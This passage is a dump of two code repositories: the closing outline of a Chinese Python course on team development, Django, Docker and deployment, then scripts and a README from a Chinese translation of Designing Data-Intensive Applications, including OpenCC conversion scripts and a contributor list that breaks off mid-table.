软件过程模型 - 经典过程模型(瀑布模型) - 可行性分析(研究做还是不做),输出《可行性分析报告》。 - 需求分析(研究做什么),输出《需求规格说明书》和产品界面原型图。 - 概要设计和详细设计,输出概念模型图(ER图)、物理模型图、类图、时序图等。 - 编码 / 测试。 - 上线 / 维护。 瀑布模型最大的缺点是无法拥抱需求变化,整套流程结束后才能看到产品,团队士气低落。 - 敏捷开发(Scrum)- 产品所有者、Scrum Master、研发人员 - Sprint - 产品的Backlog(用户故事、产品原型)。 - 计划会议(评估和预算)。 - 日常开发(站立会议、番茄工作法、结对编程、测试先行、代码重构……)。 - 修复bug(问题描述、重现步骤、测试人员、被指派人)。 - 发布版本。 - 评审会议(Showcase,用户需要参与)。 - 回顾会议(对当前迭代周期做一个总结)。 > 补充:敏捷软件开发宣言 > > - **个体和互动** 高于 流程和工具 > - **工作的软件** 高于 详尽的文档 > - **客户合作** 高于 合同谈判 > - **响应变化** 高于 遵循计划 ![](./res/agile-scrum-sprint-cycle.png) > 角色:产品所有者(决定做什么,能对需求拍板的人)、团队负责人(解决各种问题,专注如何更好的工作,屏蔽外部对开发团队的影响)、开发团队(项目执行人员,具体指开发人员和测试人员)。 > 准备工作:商业案例和资金、合同、憧憬、初始产品需求、初始发布计划、入股、组建团队。 > 敏捷团队通常人数为8-10人。 > 工作量估算:将开发任务量化,包括原型、Logo设计、UI设计、前端开发等,尽量把每个工作分解到最小任务量,最小任务量标准为工作时间不能超过两天,然后估算总体项目时间。把每个任务都贴在看板上面,看板上分三部分:to do(待完成)、in progress(进行中)和done(已完成)。 2. 项目团队组建 - 团队的构成和角色 > 说明:感谢**付祥英**女士帮助我绘制了下面这张精美的公司组织架构图。 ![company_architecture](./res/company_architecture.png) - 编程规范和代码审查(`flake8`、`pylint`) ![](./res/pylint.png) - Python中的一些“惯例”(请参考[《Python惯例-如何编写Pythonic的代码》](Python惯例.md)) - 影响代码可读性的原因: - 代码注释太少或者没有注释 - 代码破坏了语言的最佳实践 - 反模式编程(意大利面代码、复制-黏贴编程、自负编程、……) 3. 团队开发工具介绍 - 版本控制:Git、Mercury - 缺陷管理:[Gitlab](https://about.gitlab.com/)、[Redmine](http://www.redmine.org.cn/) - 敏捷闭环工具:[禅道](https://www.zentao.net/)、[JIRA](https://www.atlassian.com/software/jira/features) - 持续集成:[Jenkins](https://jenkins.io/)、[Travis-CI](https://travis-ci.org/) 请参考[《团队项目开发的问题和解决方案》](Day91-100/91.团队项目开发的问题和解决方案.md)。 ##### 项目选题和理解业务 1. 选题范围设定 - CMS(用户端):新闻聚合网站、问答/分享社区、影评/书评网站等。 - MIS(用户端+管理端):KMS、KPI考核系统、HRS、CRM系统、供应链系统、仓储管理系统等。 - App后台(管理端+数据接口):二手交易类、报刊杂志类、小众电商类、新闻资讯类、旅游类、社交类、阅读类等。 - 其他类型:自身行业背景和工作经验、业务容易理解和把控。 2. 需求理解、模块划分和任务分配 - 需求理解:头脑风暴和竞品分析。 - 模块划分:画思维导图(XMind),每个模块是一个枝节点,每个具体的功能是一个叶节点(用动词表述),需要确保每个叶节点无法再生出新节点,确定每个叶子节点的重要性、优先级和工作量。 - 任务分配:由项目负责人根据上面的指标为每个团队成员分配任务。 ![](./res/requirements_by_xmind.png) 3. 制定项目进度表(每日更新) | 模块 | 功能 | 人员 | 状态 | 完成 | 工时 | 计划开始 | 实际开始 | 计划结束 | 实际结束 | 备注 | | ---- | -------- | ------ | -------- | ---- | ---- | -------- | -------- | -------- | -------- | ---------------- | | 评论 | 添加评论 | 王大锤 | 正在进行 | 50% | 4 | 2018/8/7 | | 2018/8/7 | | | | | 删除评论 | 王大锤 | 等待 | 0% | 2 | 2018/8/7 | | 2018/8/7 | | | | | 查看评论 | 白元芳 | 正在进行 | 20% | 4 | 2018/8/7 | | 2018/8/7 | | 需要进行代码审查 | | | 评论投票 | 白元芳 | 等待 | 0% | 4 | 2018/8/8 | | 2018/8/8 | | | 4. OOAD和数据库设计 - UML(统一建模语言)的类图 ![uml](./res/uml-class-diagram.png) - 通过模型创建表(正向工程),例如在Django项目中可以通过下面的命令创建二维表。 ```Shell python manage.py makemigrations app python manage.py migrate ``` - 使用PowerDesigner绘制物理模型图。 ![](./res/power-designer-pdm.png) - 通过数据表创建模型(反向工程),例如在Django项目中可以通过下面的命令生成模型。 ```Shell python manage.py inspectdb > app/models.py ``` #### 第92天:[Docker容器技术详解](./Day91-100/92.Docker容器技术详解.md) 1. Docker简介 2. 安装Docker 3. 使用Docker创建容器(Nginx、MySQL、Redis、Gitlab、Jenkins) 4. 构建Docker镜像(Dockerfile的编写和相关指令) 5. 容器编排(Docker-compose) 6. 集群管理(Kubernetes) #### 第93天:[MySQL性能优化](./Day91-100/93.MySQL性能优化.md) 1. 基本原则 2. InnoDB引擎 3. 索引的使用和注意事项 4. 数据分区 5. SQL优化 6. 配置优化 7. 架构优化 #### 第94天:[网络API接口设计](./Day91-100/94.网络API接口设计.md) - 设计原则 - 关键问题 - 其他问题 - 文档撰写 #### 第95天:[使用Django开发商业项目](./Day91-100/95.使用Django开发商业项 目.md) ##### 项目开发中的公共问题 1. 数据库的配置(多数据库、主从复制、数据库路由) 2. 缓存的配置(分区缓存、键设置、超时设置、主从复制、故障恢复(哨兵)) 3. 日志的配置 4. 分析和调试(Django-Debug-ToolBar) 5. 好用的Python模块(日期计算、图像处理、数据加密、三方API) ##### REST API设计 1. 
RESTful架构 - [理解RESTful架构](http://www.ruanyifeng.com/blog/2011/09/restful.html) - [RESTful API设计指南](http://www.ruanyifeng.com/blog/2014/05/restful_api.html) - [RESTful API最佳实践](http://www.ruanyifeng.com/blog/2018/10/restful-api-best-practices.html) 2. API接口文档的撰写 - [RAP2](http://rap2.taobao.org/) - [YAPI](http://yapi.demo.qunar.com/) 3. [django-REST-framework](https://www.django-rest-framework.org/)的应用 ##### 项目中的重点难点剖析 1. 使用缓存缓解数据库压力 - Redis 2. 使用消息队列做解耦合和削峰 - Celery + RabbitMQ #### 第96天:[软件测试和自动化测试](Day91-100/96.软件测试和自动化测试.md) ##### 单元测试 1. 测试的种类 2. 编写单元测试(`unittest`、`pytest`、`nose2`、`tox`、`ddt`、……) 3. 测试覆盖率(`coverage`) ##### Django项目部署 1. 部署前的准备工作 - 关键设置(SECRET_KEY / DEBUG / ALLOWED_HOSTS / 缓存 / 数据库) - HTTPS / CSRF_COOKIE_SECUR / SESSION_COOKIE_SECURE - 日志相关配置 2. Linux常用命令回顾 3. Linux常用服务的安装和配置 4. uWSGI/Gunicorn和Nginx的使用 - Gunicorn和uWSGI的比较 - 对于不需要大量定制化的简单应用程序,Gunicorn是一个不错的选择,uWSGI的学习曲线比Gunicorn要陡峭得多,Gunicorn的默认参数就已经能够适应大多数应用程序。 - uWSGI支持异构部署。 - 由于Nginx本身支持uWSGI,在线上一般都将Nginx和uWSGI捆绑在一起部署,而且uWSGI属于功能齐全且高度定制的WSGI中间件。 - 在性能上,Gunicorn和uWSGI其实表现相当。 5. 使用虚拟化技术(Docker)部署测试环境和生产环境 ##### 性能测试 1. AB的使用 2. SQLslap的使用 3. sysbench的使用 ##### 自动化测试 1. 使用Shell和Python进行自动化测试 2. 使用Selenium实现自动化测试 - Selenium IDE - Selenium WebDriver - Selenium Remote Control 3. 测试工具Robot Framework介绍 #### 第97天:[电商网站技术要点剖析](./Day91-100/97.电商网站技术要点剖析.md) 1. 商业模式和需求要点 2. 物理模型设计 3. 第三方登录 4. 缓存预热和查询缓存 5. 购物车的实现 6. 支付功能集成 7. 秒杀和超卖问题 8. 静态资源管理 9. 全文检索方案 #### 第98天:[项目部署上线和性能调优](./Day91-100/98.项目部署上线和性能调优.md) 1. MySQL数据库调优 2. Web服务器性能优化 - Nginx负载均衡配置 - Keepalived实现高可用 3. 代码性能调优 - 多线程 - 异步化 4. 静态资源访问优化 - 云存储 - CDN #### 第99天:[面试中的公共问题](./Day91-100/99.面试中的公共问题.md) - 计算机基础 - Python基础 - Web框架相关 - 爬虫相关问题 - 数据分析 - 项目相关 #### 第100天:[Python面试题实录](./Day91-100/100.Python面试题实录.md)
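The Day56 and Day95 items above mention caching pages with a decorator and using Redis-backed caching to relieve database pressure. Below is a minimal, non-authoritative sketch of that idea in a Django view; the view name, cache key, and `expensive_query` helper are hypothetical, and it assumes a `CACHES` backend (for example django-redis) is already configured in `settings.py`.

```python
# Hypothetical sketch of the "页面缓存 / 为数据接口提供缓存" idea from Day56.
from django.core.cache import cache                  # low-level cache API
from django.http import JsonResponse
from django.views.decorators.cache import cache_page


def expensive_query():
    """Stand-in for a slow database query."""
    return [{"id": i, "title": "article %d" % i} for i in range(20)]


@cache_page(60 * 5)                                   # cache the whole response for 5 minutes
def hot_articles(request):
    data = cache.get("hot:articles")                  # try the cache (e.g. Redis) first
    if data is None:
        data = expensive_query()
        cache.set("hot:articles", data, timeout=300)  # write back with a TTL
    return JsonResponse({"articles": data})
```

The same two-level pattern (a whole-page decorator plus the low-level `cache.get`/`cache.set` API for individual data interfaces) is what the Day95 "使用缓存缓解数据库压力" item refers to.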
ddia
a735a7937df7533122defd88884ce34f67ef0505
File: bin/translate.py """Convert zh-cn to zh-tw Refer to https://github.com/BYVoid/OpenCC """ import click import opencc from pathlib import Path from pprint import pprint @click.group() def cli(): pass def convert(infile: str, outfile: str, cfg: str): """read >> convert >> write file Args: infile (str): input file outfile (str): output file cfg (str): config """ converter = opencc.OpenCC(cfg) with open(infile, "r") as inf, open(outfile, "w+") as outf: outf.write("\n".join(converter.convert(line) for line in inf)) print(f"Convert to {outfile}") @cli.command() @click.option("-i", "--input", "infile", required=True) @click.option("-o", "--output", "outfile", required=True) @click.option("-c", "--config", "cfg", required=True, default="s2twp.json") def file(infile: str, outfile: str, cfg: str): """read >> convert >> write file Args: infile (str): input file outfile (str): output file cfg (str): config """ convert(infile, outfile, cfg) @cli.command() @click.option("-i", "--input", "infolder", required=True) @click.option("-o", "--output", "outfolder", required=True) @click.option("-c", "--config", "cfg", required=True, default="s2twp.json") def repo(infolder, outfolder, cfg): if not Path(outfolder).exists(): Path(outfolder).mkdir(parents=True) print(f"Create {outfolder}") infiles = Path(infolder).resolve().glob("*.md") pair = [ {"infile": str(infile), "outfile": str(Path(outfolder).resolve() / infile.name)} for idx, infile in enumerate(infiles) ] for p in pair: convert(p["infile"], p["outfile"], cfg) if __name__ == "__main__": cli() File: bin/zh-tw.py #!/usr/bin/env python3 import os, sys, opencc def convert(src_path, dst_path, cfg='s2twp.json'): converter = opencc.OpenCC(cfg) with open(src_path, "r", encoding='utf-8') as src, open(dst_path, "w+", encoding='utf-8') as dst: dst.write("\n".join( converter.convert(line.rstrip()).replace('(img/', '(../img/') .replace('髮送', '傳送') .replace('髮布', '釋出') .replace('髮生', '發生') .replace('髮出', '發出') .replace('嚐試', '嘗試') .replace('線上性一致', '在線性一致') # 优先按“在线”解析了? .replace('復雜', '複雜') .replace('討論瞭', '討論了') .replace('倒黴', '倒楣') .replace('區域性性', '區域性') .replace('下麵條件', '下面條件') # 优先按“面条”解析了? .replace('當日志', '當日誌') # 优先按“当日”解析了,没有考虑后面的“日志”? .replace('真即時間', '真實時間') # 优先按“实时”解析了,没有考虑前面的“真实”? for line in src)) print("convert %s to %s" % (src_path, dst_path)) if __name__ == '__main__': print(sys.argv) home = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(sys.argv[0])), '..')) os.chdir(home) for f in os.listdir(): if f.endswith('.md'): convert(f, "zh-tw/" + f)
# 设计数据密集型应用 - 中文翻译版 [![Webite: ddia](https://img.shields.io/badge/v1-ddia.pigsty.io-slategray?style=flat)](https://ddia.pigsty.io) [![Webite: ddia2](https://img.shields.io/badge/v2-ddia2.pigsty.io-slategray?style=flat)](https://ddia2.pigsty.io) [![GitHub Stars](https://img.shields.io/github/stars/Vonng/ddia?style=flat&logo=github&logoColor=black&color=slategray)](https://star-history.com/#Vonng/ddia&Date) **作者**: [Martin Kleppmann](https://martin.kleppmann.com),[《Designing Data-Intensive Applications 2nd Edition》](https://learning.oreilly.com/library/view/designing-data-intensive-applications/9781098119058/ch01.html) : 英国剑桥大学分布式系统研究员,演讲者,博主和开源贡献者,软件工程师和企业家,曾在 LinkedIn 和 Rapportive 负责数据基础架构。 **译者**:[冯若航](https://vonng.com) / [Vonng](https://github.com/Vonng) ([email protected]): 创业者,[开源贡献者](https://gitstar-ranking.com/Vonng),PostgreSQL Hacker。开源 RDS PG [Pigsty](https://pigsty.cc/zh/) 与公众号《[非法加冯](https://mp.weixin.qq.com/s/p4Ys10ZdEDAuqNAiRmcnIQ)》作者,[数据库老司机](https://pigsty.cc/zh/blog/db),[云计算泥石流](https://pigsty.cc/zh/blog/cloud),曾于阿里,苹果,探探担任架构师与DBA。 **校订**: [@yingang](https://github.com/yingang) | [繁體中文](zh-tw/README.md) **版本维护** by [@afunTW](https://github.com/afunTW) **阅览**:在本地使用 [Docsify](https://docsify.js.org/) (根目录中执行 `make`) 或 [Typora](https://www.typora.io)、[Gitbook](https://vonng.gitbook.io/vonng/) 以获取最佳阅读体验。 **通知**:DDIA [**第二版**](https://github.com/Vonng/ddia/tree/v2) 正在翻译中 ([`v2`](https://github.com/Vonng/ddia/tree/v2)分支),欢迎加入并提出您的宝贵意见! --------- ## 译序 > 不懂数据库的全栈工程师不是好架构师 > > —— 冯若航 / Vonng 现今,尤其是在互联网领域,大多数应用都属于数据密集型应用。本书从底层数据结构到顶层架构设计,将数据系统设计中的精髓娓娓道来。其中的宝贵经验无论是对架构师、DBA、还是后端工程师、甚至产品经理都会有帮助。 这是一本理论结合实践的书,书中很多问题,译者在实际场景中都曾遇到过,读来让人击节扼腕。如果能早点读到这本书,该少走多少弯路啊! 这也是一本深入浅出的书,讲述概念的来龙去脉而不是卖弄定义,介绍事物发展演化历程而不是事实堆砌,将复杂的概念讲述的浅显易懂,但又直击本质不失深度。每章最后的引用质量非常好,是深入学习各个主题的绝佳索引。 本书为数据系统的设计、实现、与评价提供了很好的概念框架。读完并理解本书内容后,读者可以轻松看破大多数的技术忽悠,与技术砖家撕起来虎虎生风🤣。 这是 2017 年译者读过最好的一本技术类书籍,这么好的书没有中文翻译,实在是遗憾。某不才,愿为先进技术文化的传播贡献一份力量。既可以深入学习有趣的技术主题,又可以锻炼中英文语言文字功底,何乐而不为? --------- ## 前言 > 在我们的社会中,技术是一种强大的力量。数据、软件、通信可以用于坏的方面:不公平的阶级固化,损害公民权利,保护既得利益集团。但也可以用于好的方面:让底层人民发出自己的声音,让每个人都拥有机会,避免灾难。本书献给所有将技术用于善途的人们。 --------- > 计算是一种流行文化,流行文化鄙视历史。流行文化关乎个体身份和参与感,但与合作无关。流行文化活在当下,也与过去和未来无关。我认为大部分(为了钱)编写代码的人就是这样的,他们不知道自己的文化来自哪里。 > > —— 阿兰・凯接受 Dobb 博士的杂志采访时(2012 年) --------- ## 目录 ### [序言](preface.md) ### [第一部分:数据系统基础](part-i.md) * [第一章:可靠性、可伸缩性和可维护性](ch1.md) * [关于数据系统的思考](ch1.md#关于数据系统的思考) * [可靠性](ch1.md#可靠性) * [可伸缩性](ch1.md#可伸缩性) * [可维护性](ch1.md#可维护性) * [本章小结](ch1.md#本章小结) * [第二章:数据模型与查询语言](ch2.md) * [关系模型与文档模型](ch2.md#关系模型与文档模型) * [数据查询语言](ch2.md#数据查询语言) * [图数据模型](ch2.md#图数据模型) * [本章小结](ch2.md#本章小结) * [第三章:存储与检索](ch3.md) * [驱动数据库的数据结构](ch3.md#驱动数据库的数据结构) * [事务处理还是分析?](ch3.md#事务处理还是分析?) 
* [列式存储](ch3.md#列式存储) * [本章小结](ch3.md#本章小结) * [第四章:编码与演化](ch4.md) * [编码数据的格式](ch4.md#编码数据的格式) * [数据流的类型](ch4.md#数据流的类型) * [本章小结](ch4.md#本章小结) ### [第二部分:分布式数据](part-ii.md) * [第五章:复制](ch5.md) * [领导者与追随者](ch5.md#领导者与追随者) * [复制延迟问题](ch5.md#复制延迟问题) * [多主复制](ch5.md#多主复制) * [无主复制](ch5.md#无主复制) * [本章小结](ch5.md#本章小结) * [第六章:分区](ch6.md) * [分区与复制](ch6.md#分区与复制) * [键值数据的分区](ch6.md#键值数据的分区) * [分区与次级索引](ch6.md#分区与次级索引) * [分区再平衡](ch6.md#分区再平衡) * [请求路由](ch6.md#请求路由) * [本章小结](ch6.md#本章小结) * [第七章:事务](ch7.md) * [事务的棘手概念](ch7.md#事务的棘手概念) * [弱隔离级别](ch7.md#弱隔离级别) * [可串行化](ch7.md#可串行化) * [本章小结](ch7.md#本章小结) * [第八章:分布式系统的麻烦](ch8.md) * [故障与部分失效](ch8.md#故障与部分失效) * [不可靠的网络](ch8.md#不可靠的网络) * [不可靠的时钟](ch8.md#不可靠的时钟) * [知识、真相与谎言](ch8.md#知识、真相与谎言) * [本章小结](ch8.md#本章小结) * [第九章:一致性与共识](ch9.md) * [一致性保证](ch9.md#一致性保证) * [线性一致性](ch9.md#线性一致性) * [顺序保证](ch9.md#顺序保证) * [分布式事务与共识](ch9.md#分布式事务与共识) * [本章小结](ch9.md#本章小结) ### [第三部分:衍生数据](part-iii.md) * [第十章:批处理](ch10.md) * [使用Unix工具的批处理](ch10.md#使用Unix工具的批处理) * [MapReduce和分布式文件系统](ch10.md#MapReduce和分布式文件系统) * [MapReduce之后](ch10.md#MapReduce之后) * [本章小结](ch10.md#本章小结) * [第十一章:流处理](ch11.md) * [传递事件流](ch11.md#传递事件流) * [数据库与流](ch11.md#数据库与流) * [流处理](ch11.md#流处理) * [本章小结](ch11.md#本章小结) * [第十二章:数据系统的未来](ch12.md) * [数据集成](ch12.md#数据集成) * [分拆数据库](ch12.md#分拆数据库) * [将事情做正确](ch12.md#将事情做正确) * [做正确的事情](ch12.md#做正确的事情) * [本章小结](ch12.md#本章小结) ### [术语表](glossary.md) ### [后记](colophon.md) --------- ## 法律声明 从原作者处得知,已经有简体中文的翻译计划,将于 2018 年末完成。[购买地址](https://search.jd.com/Search?keyword=设计数据密集型应用) 译者纯粹出于 **学习目的** 与 **个人兴趣** 翻译本书,不追求任何经济利益。 译者保留对此版本译文的署名权,其他权利以原作者和出版社的主张为准。 本译文只供学习研究参考之用,不得公开传播发行或用于商业用途。有能力阅读英文书籍者请购买正版支持。 --------- ## 贡献 0. 全文校订 by [@yingang](https://github.com/Vonng/ddia/commits?author=yingang) 1. [序言初翻修正](https://github.com/Vonng/ddia/commit/afb5edab55c62ed23474149f229677e3b42dfc2c) by [@seagullbird](https://github.com/Vonng/ddia/commits?author=seagullbird) 2. [第一章语法标点校正](https://github.com/Vonng/ddia/commit/973b12cd8f8fcdf4852f1eb1649ddd9d187e3644) by [@nevertiree](https://github.com/Vonng/ddia/commits?author=nevertiree) 3. [第六章部分校正](https://github.com/Vonng/ddia/commit/d4eb0852c0ec1e93c8aacc496c80b915bb1e6d48) 与[第十章的初翻](https://github.com/Vonng/ddia/commit/9de8dbd1bfe6fbb03b3bf6c1a1aa2291aed2490e) by [@MuAlex](https://github.com/Vonng/ddia/commits?author=MuAlex) 4. [第一部分](part-i.md)前言,[ch2](ch2.md)校正 by [@jiajiadebug](https://github.com/Vonng/ddia/commits?author=jiajiadebug) 5. [词汇表](glossary.md)、[后记](colophon.md)关于野猪的部分 by [@Chowss](https://github.com/Vonng/ddia/commits?author=Chowss) 6. [繁體中文](https://github.com/Vonng/ddia/pulls)版本与转换脚本 by [@afunTW](https://github.com/afunTW) 7. 多处翻译修正 by [@songzhibin97](https://github.com/Vonng/ddia/commits?author=songzhibin97) [@MamaShip](https://github.com/Vonng/ddia/commits?author=MamaShip) [@FangYuan33](https://github.com/Vonng/ddia/commits?author=FangYuan33) 8. 
感谢所有作出贡献,提出意见的朋友们: <details> <summary><a href="https://github.com/Vonng/ddia/pulls">Pull Requests</a> & <a href="https://github.com/Vonng/ddia/issues">Issues</a></summary> | ISSUE & Pull Requests | USER | Title | |-------------------------------------------------|------------------------------------------------------------|----------------------------------------------------------------| | [343](https://github.com/Vonng/ddia/pull/343) | [@kehao-chen](https://github.com/kehao-chen) | ch10: 优化一处翻译 | | [341](https://github.com/Vonng/ddia/pull/341) | [@YKIsTheBest](https://github.com/YKIsTheBest) | ch3: 优化两处翻译 | | [340](https://github.com/Vonng/ddia/pull/340) | [@YKIsTheBest](https://github.com/YKIsTheBest) | ch2: 优化多处翻译 | | [338](https://github.com/Vonng/ddia/pull/338) | [@YKIsTheBest](https://github.com/YKIsTheBest) | ch1: 优化一处翻译 | | [335](https://github.com/Vonng/ddia/pull/335) | [@kimi0230](https://github.com/kimi0230) | 修正一处繁体中文错误 | | [334](https://github.com/Vonng/ddia/pull/334) | [@soulrrrrr](https://github.com/soulrrrrr) | ch2: 修正一处繁体中文错误 | | [332](https://github.com/Vonng/ddia/pull/332) | [@justlorain](https://github.com/justlorain) | ch5: 修正一处翻译错误 | | [331](https://github.com/Vonng/ddia/pull/331) | [@Lyianu](https://github.com/Lyianu) | ch9: 更正几处拼写错误 | | [330](https://github.com/Vonng/ddia/pull/330) | [@Lyianu](https://github.com/Lyianu) | ch7: 优化一处翻译 | | [329](https://github.com/Vonng/ddia/issues/329) | [@Lyianu](https://github.com/Lyianu) | ch6: 指出一处翻译错误 | | [328](https://github.com/Vonng/ddia/pull/328) | [@justlorain](https://github.com/justlorain) | ch4: 更正一处翻译遗漏 | | [326](https://github.com/Vonng/ddia/pull/326) | [@liangGTY](https://github.com/liangGTY) | ch1: 优化一处翻译 | | [323](https://github.com/Vonng/ddia/pull/323) | [@marvin263](https://github.com/marvin263) | ch5: 优化一处翻译 | | [322](https://github.com/Vonng/ddia/pull/322) | [@marvin263](https://github.com/marvin263) | ch8: 优化一处翻译 | | [304](https://github.com/Vonng/ddia/pull/304) | [@spike014](https://github.com/spike014) | ch11: 优化一处翻译 | | [298](https://github.com/Vonng/ddia/pull/298) | [@Makonike](https://github.com/Makonike) | ch11&12: 修正两处错误 | | [284](https://github.com/Vonng/ddia/pull/284) | [@WAangzE](https://github.com/WAangzE) | ch4: 更正一处列表错误 | | [283](https://github.com/Vonng/ddia/pull/283) | [@WAangzE](https://github.com/WAangzE) | ch3: 更正一处错别字 | | [282](https://github.com/Vonng/ddia/pull/282) | [@WAangzE](https://github.com/WAangzE) | ch2: 更正一处公式问题 | | [281](https://github.com/Vonng/ddia/pull/281) | [@lyuxi99](https://github.com/lyuxi99) | 更正多处内部链接错误 | | [280](https://github.com/Vonng/ddia/pull/280) | [@lyuxi99](https://github.com/lyuxi99) | ch9: 更正内部链接错误 | | [279](https://github.com/Vonng/ddia/issues/279) | [@codexvn](https://github.com/codexvn) | ch9: 指出公式在 GitHub Pages 显示的问题 | | [278](https://github.com/Vonng/ddia/pull/278) | [@LJlkdskdjflsa](https://github.com/LJlkdskdjflsa) | 发现了繁体中文版本中的错误翻译 | | [275](https://github.com/Vonng/ddia/pull/275) | [@117503445](https://github.com/117503445) | 更正 LICENSE 链接 | | [274](https://github.com/Vonng/ddia/pull/274) | [@uncle-lv](https://github.com/uncle-lv) | ch7: 修正错别字 | | [273](https://github.com/Vonng/ddia/pull/273) | [@Sdot-Python](https://github.com/Sdot-Python) | ch7: 统一了 write skew 的翻译 | | [271](https://github.com/Vonng/ddia/pull/271) | [@Makonike](https://github.com/Makonike) | ch6: 统一了 rebalancing 的翻译 | | [270](https://github.com/Vonng/ddia/pull/270) | [@Ynjxsjmh](https://github.com/Ynjxsjmh) | ch7: 修正不一致的翻译 | | [263](https://github.com/Vonng/ddia/pull/263) | 
[@zydmayday](https://github.com/zydmayday) | ch5: 修正译文中的重复单词 | | [260](https://github.com/Vonng/ddia/pull/260) | [@haifeiWu](https://github.com/haifeiWu) | ch4: 修正部分不准确的翻译 | | [258](https://github.com/Vonng/ddia/pull/258) | [@bestgrc](https://github.com/bestgrc) | ch3: 修正一处翻译错误 | | [257](https://github.com/Vonng/ddia/pull/257) | [@UnderSam](https://github.com/UnderSam) | ch8: 修正一处拼写错误 | | [256](https://github.com/Vonng/ddia/pull/256) | [@AlphaWang](https://github.com/AlphaWang) | ch7: 修正“可串行化”相关内容的多处翻译不当 | | [255](https://github.com/Vonng/ddia/pull/255) | [@AlphaWang](https://github.com/AlphaWang) | ch7: 修正“可重复读”相关内容的多处翻译不当 | | [253](https://github.com/Vonng/ddia/pull/253) | [@AlphaWang](https://github.com/AlphaWang) | ch7: 修正“读已提交”相关内容的多处翻译不当 | | [246](https://github.com/Vonng/ddia/pull/246) | [@derekwu0101](https://github.com/derekwu0101) | ch3: 修正繁体中文的转译错误 | | [245](https://github.com/Vonng/ddia/pull/245) | [@skyran1278](https://github.com/skyran1278) | ch12: 修正繁体中文的转译错误 | | [244](https://github.com/Vonng/ddia/pull/244) | [@Axlgrep](https://github.com/Axlgrep) | ch9: 修正不通顺的翻译 | | [242](https://github.com/Vonng/ddia/pull/242) | [@lynkeib](https://github.com/lynkeib) | ch9: 修正不通顺的翻译 | | [241](https://github.com/Vonng/ddia/pull/241) | [@lynkeib](https://github.com/lynkeib) | ch8: 修正不正确的公式格式 | | [240](https://github.com/Vonng/ddia/pull/240) | [@8da2k](https://github.com/8da2k) | ch9: 修正不通顺的翻译 | | [239](https://github.com/Vonng/ddia/pull/239) | [@BeBraveBeCurious](https://github.com/BeBraveBeCurious) | ch7: 修正不一致的翻译 | | [237](https://github.com/Vonng/ddia/pull/237) | [@zhangnew](https://github.com/zhangnew) | ch3: 修正错误的图片链接 | | [229](https://github.com/Vonng/ddia/pull/229) | [@lis186](https://github.com/lis186) | 指出繁体中文的转译错误:复杂 | | [226](https://github.com/Vonng/ddia/pull/226) | [@chroming](https://github.com/chroming) | ch1: 修正导航栏中的章节名称 | | [220](https://github.com/Vonng/ddia/pull/220) | [@skyran1278](https://github.com/skyran1278) | ch9: 修正线性一致的繁体中文翻译 | | [194](https://github.com/Vonng/ddia/pull/194) | [@BeBraveBeCurious](https://github.com/BeBraveBeCurious) | ch4: 修正错误的翻译 | | [193](https://github.com/Vonng/ddia/pull/193) | [@BeBraveBeCurious](https://github.com/BeBraveBeCurious) | ch4: 优化译文 | | [192](https://github.com/Vonng/ddia/pull/192) | [@BeBraveBeCurious](https://github.com/BeBraveBeCurious) | ch4: 修正不一致和不通顺的翻译 | | [190](https://github.com/Vonng/ddia/pull/190) | [@Pcrab](https://github.com/Pcrab) | ch1: 修正不准确的翻译 | | [187](https://github.com/Vonng/ddia/pull/187) | [@narojay](https://github.com/narojay) | ch9: 修正生硬的翻译 | | [186](https://github.com/Vonng/ddia/pull/186) | [@narojay](https://github.com/narojay) | ch8: 修正错别字 | | [185](https://github.com/Vonng/ddia/issues/185) | [@8da2k](https://github.com/8da2k) | 指出小标题跳转的问题 | | [184](https://github.com/Vonng/ddia/pull/184) | [@DavidZhiXing](https://github.com/DavidZhiXing) | ch10: 修正失效的网址 | | [183](https://github.com/Vonng/ddia/pull/183) | [@OneSizeFitsQuorum](https://github.com/OneSizeFitsQuorum) | ch8: 修正错别字 | | [182](https://github.com/Vonng/ddia/issues/182) | [@lroolle](https://github.com/lroolle) | 建议docsify的主题风格 | | [181](https://github.com/Vonng/ddia/pull/181) | [@YunfengGao](https://github.com/YunfengGao) | ch2: 修正翻译错误 | | [180](https://github.com/Vonng/ddia/pull/180) | [@skyran1278](https://github.com/skyran1278) | ch3: 指出繁体中文的转译错误 | | [177](https://github.com/Vonng/ddia/pull/177) | [@exzhawk](https://github.com/exzhawk) | 支持 Github Pages 里的公式显示 | | [176](https://github.com/Vonng/ddia/pull/176) | 
[@haifeiWu](https://github.com/haifeiWu) | ch2: 语义网相关翻译更正 | | [175](https://github.com/Vonng/ddia/pull/175) | [@cwr31](https://github.com/cwr31) | ch7: 不变式相关翻译更正 | | [174](https://github.com/Vonng/ddia/pull/174) | [@BeBraveBeCurious](https://github.com/BeBraveBeCurious) | README & preface: 更正不正确的中文用词和标点符号 | | [173](https://github.com/Vonng/ddia/pull/173) | [@ZvanYang](https://github.com/ZvanYang) | ch12: 修正不完整的翻译 | | [171](https://github.com/Vonng/ddia/pull/171) | [@ZvanYang](https://github.com/ZvanYang) | ch12: 修正重复的译文 | | [169](https://github.com/Vonng/ddia/pull/169) | [@ZvanYang](https://github.com/ZvanYang) | ch12: 更正不太通顺的翻译 | | [166](https://github.com/Vonng/ddia/pull/166) | [@bp4m4h94](https://github.com/bp4m4h94) | ch1: 发现错误的文献索引 | | [164](https://github.com/Vonng/ddia/pull/164) | [@DragonDriver](https://github.com/DragonDriver) | preface: 更正错误的标点符号 | | [163](https://github.com/Vonng/ddia/pull/163) | [@llmmddCoder](https://github.com/llmmddCoder) | ch1: 更正错误字 | | [160](https://github.com/Vonng/ddia/pull/160) | [@Zhayhp](https://github.com/Zhayhp) | ch2: 建议将 network model 翻译为网状模型 | | [159](https://github.com/Vonng/ddia/pull/159) | [@1ess](https://github.com/1ess) | ch4: 更正错误字 | | [157](https://github.com/Vonng/ddia/pull/157) | [@ZvanYang](https://github.com/ZvanYang) | ch7: 更正不太通顺的翻译 | | [155](https://github.com/Vonng/ddia/pull/155) | [@ZvanYang](https://github.com/ZvanYang) | ch7: 更正不太通顺的翻译 | | [153](https://github.com/Vonng/ddia/pull/153) | [@DavidZhiXing](https://github.com/DavidZhiXing) | ch9: 修正缩略图的错别字 | | [152](https://github.com/Vonng/ddia/pull/152) | [@ZvanYang](https://github.com/ZvanYang) | ch7: 除重->去重 | | [151](https://github.com/Vonng/ddia/pull/151) | [@ZvanYang](https://github.com/ZvanYang) | ch5: 修订sibling相关的翻译 | | [147](https://github.com/Vonng/ddia/pull/147) | [@ZvanYang](https://github.com/ZvanYang) | ch5: 更正一处不准确的翻译 | | [145](https://github.com/Vonng/ddia/pull/145) | 